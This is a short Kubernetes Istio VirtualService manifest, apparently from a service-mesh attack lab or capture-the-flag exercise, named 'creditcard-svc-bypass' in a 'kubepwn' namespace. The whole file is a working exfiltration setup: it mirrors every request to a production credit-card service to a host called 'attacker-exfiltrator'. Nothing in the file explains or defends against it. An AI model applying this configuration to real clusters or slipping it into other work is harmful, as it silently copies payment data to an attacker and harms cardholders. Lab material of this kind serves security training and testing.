bonus/service-mesh-exploit/vs-mirror.yaml
#vs-mirror.yaml
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
  name: creditcard-svc-bypass
  namespace: kubepwn
spec:
  hosts:
  - creditcard.prod.svc.cluster.local
  http:
  - route:
    - destination:
        host: creditcard.prod.svc.cluster.local
    mirror:
      host: attacker-exfiltrator.kubepwn.svc.cluster.local
